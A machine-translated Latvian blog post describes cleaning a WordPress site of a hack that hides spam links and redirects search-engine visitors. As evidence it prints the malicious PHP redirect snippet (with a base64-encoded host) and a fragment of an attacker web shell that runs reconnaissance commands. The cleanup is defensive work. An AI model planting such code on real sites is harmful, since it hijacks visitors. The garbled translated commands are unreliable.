Pēdējā mēneša laikā, es esmu saņēmis brīdinājumus vīruss blogs Dažos apmeklētājiem. Sākumā es ignorēja brīdinājumus, jo es uzstādītas diezgan labs antivīruss (Kaspersky AV 2009) Un, lai gan blog uz ilgu laiku, es nekad got vīrusu brīdinājumu (.. es redzēju kaut ko aizdomīgu agrāk, ka pirmais atsvaidzināt pazuda. Beidzot ...).
Lēnām sāka parādīties lielas variācijas apmeklētājs satiksmePēc tam satiksme pēdējā laikā ir pastāvīgi samazinājusies, un sāka arvien vairāk un vairāk cilvēku, kas pateiks man, ka stealthsettings. Ar tas ir virused. Vakar es saņēmu no kāda screenshot darīts, kad antivīruss bloķēts scenārijs no stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Tas bija diezgan pārliecinošs, lai man, ka man visus avotus, pārmeklē. Pirmā doma, kas ienāca, manuprāt, bija jādara jauninājums jaunāko versiju WordPress (2.5.1), bet ne pirms visu vecā skripta failu dzēšanas WordPress un izgatavot backup datu bāze. Šī procedūra nedarbojās, un, iespējams, man vajadzēja daudz laika, lai saprastu, kur atrodas kļūda, ja tā man nebūtu teikusi. Eugen diskusijā pie kafijas tases, viņš atrada saite Google un tas būtu labi, lai redzētu viņu.
MyDigitalLife.info publicēja rakstu ar nosaukumu: “WordPress Uzlauzt: Google un meklētājprogrammas atkopšana un labošana vai sīkfailu trafika, kas nav novirzīta uz Your-Needs.info, AnyResults.Net, Golden-Info.net un citām nelegālām vietnēm."Tas ir beigām pavedienu es nepieciešama.
Tas ir par izmantot de WordPress pamatojoties uz sīkfailiem, Kas, manuprāt, ir ļoti sarežģīts un ir grāmatu. Gudrs pietiekami, lai veiktu SQL injekcijas Datubāze blogā, lai izveidotu neredzamu lietotāju vienkārši regulāra pārbaude Mans Profils->Lietotāji, pārbaudiet servera katalogi un faili "rakstāmās" (tas chmod 777), meklēt un uz izpildīt failus ar no root lietotājam vai grupai privilēģijas. Es nezinu, kas ekspluatē vārdu un redzēt, ka ir maz rakstiem par viņu, neskatoties uz to, ka daudzi blogi ir inficēti, ieskaitot Rumāniju. Ok ... Es mēģināšu, lai mēģinātu izskaidrot vispārīgu informāciju par vīrusu.
Kas ir vīruss?
Pirmkārt, ievietojiet avota lapas blogus, saites neredzams apmeklētājiem, bet redzama un indeksēt meklētājprogrammas, it īpaši Google. Šādi nodot page rank vietās, ko norādījis uzbrucējs. Otrkārt, tiek ievietots vēl viens novirzīšana kods URL apmeklētāju nāk no Google, Live, Yahoo, ... vai RSS lasītājs un nevis vieta cepums. antivīruss atrod novirzīt kā Trojan-Clicker.HTML.
Simptomi:
Masveida samazināšanās apmeklētāju plūsmu, Jo īpaši par blogiem, kur lielākā daļa apmeklētāju nāk no Google.
Identifikācija: (šeit problēma kļūst sarežģīta tiem, kas neko daudz nezina par phpmyadmin, php un linux)
LA. UZMANĪBU! Vispirms veikt backup datu bāze!
1. Pārbaudiet avota failus index.php, header.php, footer.php, Blog tēmu, un redzēt, ja ir kods, kas izmanto šifrēšanu base64 vai satur “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”formā:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Vai kaut ko. Dzēst šo kodu!
Klikšķiniet uz attēla, ...
Iepriekš redzamajā ekrānuzņēmumā es nejauši atlasīju un ". Šim kodam jāpaliek.
2. Izmantot phpMyAdmin un iet uz datubāzes tabulas wp_usersKur pārbaudīt, ja nav lietotāja vārds veidots 00:00:00 0000-00-00 (Iespējams izvietošana USER_LOGIN rakstīt "WordPress”. Pierakstiet šī lietotāja ID (ID lauku) un pēc tam izdzēsiet to.
Klikšķiniet uz attēla, ...
* Zaļā līnija jānoņem un saglabāja savu ID. Gadījumā, ja miegainsBija ID = 8 .
3. Iet uz tabulu wp_usermeta, Kur kas atrodas un noslaucīt līnijas ID (ja lauks user_id ID vērtība parādās svītrots).
4. tabula wp_option, Iet uz active_plugins un redzēt, kas spraudnis ir iespējots aizdomas. To var izmantot, piemēram galotnes _old.giff, _old.pngg, _old.jpeg, _new.php.giffutt. bagātinātu attēlu paplašinājumu kombinācijas ar _old un _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Izdzēsiet šo spraudni un pēc tam dodieties uz emuāru -> Informācijas panelis -> Spraudņi, kur jūs deaktivizējat un aktivizējat jebkuru spraudni.
Klikšķiniet uz attēla, lai redzētu, šķiet active_plugins vīrusa failu.
Sekot ceļš uz FTP vai SSH, norādīts active_plugins un izdzēst failu no servera.
5. Visi phpMyAdmin, tabulā wp_option, Atrast un izdzēst līniju, kas satur "rss_f541b3abd05e7962fcab37737f40fad8"Un starp"internal_links_cache ".
Jo internal_links_cache tiek veikti šifrētu surogātpasta saites, kas parādās jūsu emuāru, un kods Google Adspakausis, Hacker.
6. Ieteicams ir nomainīt paroli Blog un pieteikšanās noņemt visus aizdomīgu userele. Jauniniet uz jaunāko versiju WordPress un iestatiet, lai emuārs pārtrauc jaunu lietotāju reģistrāciju. Zaudējumu nav... viņi var komentēt arī neapdzīvoti.
Es mēģināju iepriekš nedaudz paskaidrot, kā rīkoties šādā situācijā, lai iztīrītu emuāru no šī vīrusa. Problēma ir daudz nopietnāka, nekā šķiet, un nav gandrīz atrisināta, jo tās tiek izmantotas drošības ievainojamības tīmekļa servera hosting, kas ir blogs.
Kā pirmo pasākumu drošību, ar piekļuvi SSH, Veikt dažas pārbaudes uz servera, lai redzētu, vai jebkuru failus, piemēram, * _old * un * _new. * Ar galotnes.GIFF, jpeg,.. pngg. jpgg. Šie faili ir jāsvītro. Ja jūs pārdēvēt failu, piem. top_right_old.giff in top_right_old.phpMēs redzam, ka fails ir tieši izmanto kodu serveri.
Daži noderīgi norādījumi servera pārbaudei, tīrīšanai un drošībai. (izmantojot SSH)
1. cd / tmp un pārbaudīt, ja ir mapes, piemēram, tmpVFlma vai citas kombinācijas ir tāds pats vārds un izdzēst. Skatīt attēlā zemāk, divas šādas mapes no manis:
rm-rf mapes_nosaukums
2. Pārbaudiet un noņemiet (mainīt chmod-ul) pēc iespējas mapes ar atribūtiem chmod 777
atrast visus ierakstāmos failus pašreizējā direktorijā: Atrast. -Type f-Perma-2-ls
atrast visu rakstāmās katalogi strāva dir: Atrast. -Type d-Perma-2-ls
atrodiet visus ierakstāmos direktorijus un failus pašreizējā direktorijā: atrast. -Allows -2 -Ls
3. Meklē aizdomīgus failus uz servera.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, UZMANĪBU! failus, kas tika noteikti mazliet SUID si SGID. Šie faili izpildīt ar lietotāja (grupas) vai saknes, nevis lietotājs, kurš izpildīt failu privilēģijām. Šos failus var novest pie sakņu kompromiss, ja drošības jautājumi. Ja jūs izmantojat failus ar SUID un SGID biti, veiktu "chmod 0 " uz vai atinstalēt paketi, kas satur tos.
Izmantot satur kaut kur avots ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Tādā veidā ... būtībā konstatē pārkāpumus drošību. Ostas atvērt katalogi "rakstāmās" un grupa izpildes privilēģijas failus / root.
Atpakaļ ar vairāk ...
Daži inficēti blogi: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Sarakstā tālāk ... daudz.
Izmantojot Google meklētājprogrammu, varat pārbaudīt, vai emuārs ir inficēts. kopēt ielīmēt:
vietā www.blegoo.com nopirkt
Ar labu nakti un labu darbu;) Drīz es domāju, ka Jevgeņs ieradīsies ar jaunumiem vietnē foresseable.unpredictable.com.
BRB :)
UZMANĪBU! Mainot tēmu WordPress vai jauniniet uz WordPress 2.5.1, NAV risinājums, lai atbrīvotos no šī vīrusa.
